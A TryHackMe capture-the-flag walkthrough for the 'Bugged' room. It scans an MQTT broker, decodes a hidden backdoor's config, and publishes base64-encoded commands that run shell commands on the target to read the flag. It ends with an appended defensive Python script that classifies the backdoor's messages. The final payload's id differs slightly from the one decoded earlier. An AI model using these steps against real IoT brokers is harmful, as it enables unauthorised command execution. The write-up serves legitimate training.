Bugged || TryHackMe WalkThrough

Nihir Zala
5 min read · Oct 3, 2024


The intro to the room is:

John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?

And our question is:

What is the flag?

Let’s begin!

Step 1:

The first thing I did was scan the host with Nmap to find out that there were no open ports.

First scan-nmap, no open ports.

So I tried RustScan to scan all the ports:

Second scan-RustScan, port 1883 is open.

It found that port 1883 is open, running the "MQTT" service. A quick search for this service told me what it is for.

MQTT (Message Queue Telemetry Transport) is a lightweight messaging protocol designed for Internet of Things (IoT) devices and communication with minimal network bandwidth and power consumption.

Makes sense for a smart home application.

Now let's scan that port a bit more closely with:

nmap -A -p 1883 <host-ip>

And we get a long list of topics (see the Wikipedia page on MQTT; in a sentence, topics are hierarchical strings used to identify a message's destination or source).

Topics and their most recent payloads.

Some of the topics are in formats like:

$SYS/broker/#

You can read more about MQTT wildcards and topics at this link.
And some of them relate directly to the smart home application, like:

livingroom/speaker
kitchen/toaster
storage/thermostat

But none of them actually gives us any idea for the next step, so I ran the same scan again; after all, it makes sense that a smart home application's traffic changes constantly.

Another aggressive scan, and still nothing special.

The second scan did show us different payloads, but they were all similar to the last scan and still gave us no clue. So I ran another scan, and this time I found something interesting.

Base 64 payload

A payload encoded with base64, on a strange topic:

yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config:

Let's decode it.

Step 2:

I copied the message to a file named "payload.txt"
and decoded the message:

The encoded message.

Let's analyze the message now.

"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d"

Looks like the ID of whoever published that payload (we already saw similar IDs in the first scans).

"registered_commands":["HELP","CMD","SYS"]

We can see that there is a way to communicate with this machine using those commands.

"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub"
"sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"

Two topics: one for publishing and one for subscribing.

This payload was sent to a config topic, so it probably carries more than just a message.

For the next step, we’re going to publish and subscribe to the topics we found and see what we are getting.

Step 3:

Let's start with the subscribe command:

mosquitto_sub -h 10.10.151.198 -p 1883 -t U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub

Now for the publish command; we'll try to execute the "HELP" command.

mosquitto_pub -h 10.10.151.198 -p 1883 -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m "HELP"

-h specifies the host IP.
-p specifies the port.
-t specifies the topic.

Right after sending the publish message, I received another Base64-encoded message in the subscribe window.

Another encoded message.

After decoding the message I found the format for sending commands:

The decoded message.

Let’s try to send a command using the given format!

Step 4:

So now we'll encode the command we want to send as base64.

The first command will be "HELP" with no arguments; I used the id we saw in the first step.

Converting the command to base64

Now let's publish the encoded payload and look at the subscribe window:

The received payload.

Decode:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"Message format:\n Base64({\n \"id\": \"<Backdoor ID>\",\n \"cmd\": \"<Command>\",\n \"arg\": \"<arg>\",\n })\n\nCommands:\n HELP: Display help message (takes no arg)\n CMD: Run a shell command\n SYS: Return system information (takes no arg)\n"}

There are a lot of \n in there, but the idea is pretty clear. Let's now send the CMD command with ls as the argument, the same way we did before.

And we receive another message:

Decode:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag.txt\n"}

And here is our flag!

Now all that's left is to encode the last command:

{"id": "cdd1b1c01c404b0f-8e2261b357548b7d", "cmd": "CMD", "arg": "cat flag.txt"}

Publish it as we did before, as base64:

eyJpZCI6ICJjZGQxYjFjMDFjNDA0YjBmLThlMjI2MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0=

Then decode the message we get back, and this is our flag!
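As an added example (not part of the original walkthrough), here is a small Python triage script that applies the message format decoded above from the defender's side: given topic/payload pairs captured from the broker, it decodes base64-wrapped JSON and flags the config beacon, the command envelopes and the responses, while leaving plain sensor readings alone. The sample capture is constructed; the backdoor id, the three topics and the CMD payload are the ones seen in this room.

```python
import base64
import binascii
import json

# Field sets of the three backdoor message kinds observed on the broker.
CONFIG_FIELDS = {"id", "registered_commands", "pub_topic", "sub_topic"}
COMMAND_FIELDS = {"id", "cmd", "arg"}
RESPONSE_FIELDS = {"id", "response"}

def decode_payload(raw: bytes):
    """JSON object inside a base64-wrapped payload, else None (plain sensor data)."""
    try:
        obj = json.loads(base64.b64decode(raw, validate=True))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None  # not base64, not UTF-8, or not JSON
    return obj if isinstance(obj, dict) else None

def classify(topic: str, raw: bytes) -> str:
    """Label one observed message by the backdoor fields it carries."""
    obj = decode_payload(raw)
    if obj is None:
        return "benign"
    keys = set(obj)
    if CONFIG_FIELDS <= keys and topic.endswith("/config"):
        return "backdoor-config"
    if COMMAND_FIELDS <= keys:
        return "backdoor-command"
    if RESPONSE_FIELDS <= keys:
        return "backdoor-response"
    return "unknown-base64-json"

def triage(messages):
    """Return (topic, label, decoded) for every non-benign (topic, payload) pair."""
    hits = [(t, classify(t, p), decode_payload(p)) for t, p in messages]
    return [h for h in hits if h[1] != "benign"]

# Constructed sample capture (as from `mosquitto_sub -v -t '#'`): one normal
# sensor topic plus the three backdoor messages from the walkthrough.
BACKDOOR_ID = "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d"
CONFIG = {"id": BACKDOOR_ID, "registered_commands": ["HELP", "CMD", "SYS"],
          "pub_topic": "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub",
          "sub_topic": "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}
SAMPLE = [
    ("storage/thermostat", b"21.5"),
    ("yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config",
     base64.b64encode(json.dumps(CONFIG).encode())),
    ("XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub",
     b"eyJpZCI6ICJjZGQxYjFjMDFjNDA0YjBmLThlMjI2MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0="),
    ("U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub",
     base64.b64encode(json.dumps({"id": BACKDOOR_ID, "response": "flag.txt\n"}).encode())),
]
```

Running `triage(SAMPLE)` returns the three backdoor messages with their decoded JSON and skips the thermostat reading; feeding it a full `mosquitto_sub -v -t '#'` capture is the same check at broker scale.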


Nihir Zala

Hi there, I'm Nihir Zala, a Laravel developer from Gujarat, India, with over 2.5 years of professional experience. I am also learning pentesting from THM and HTB.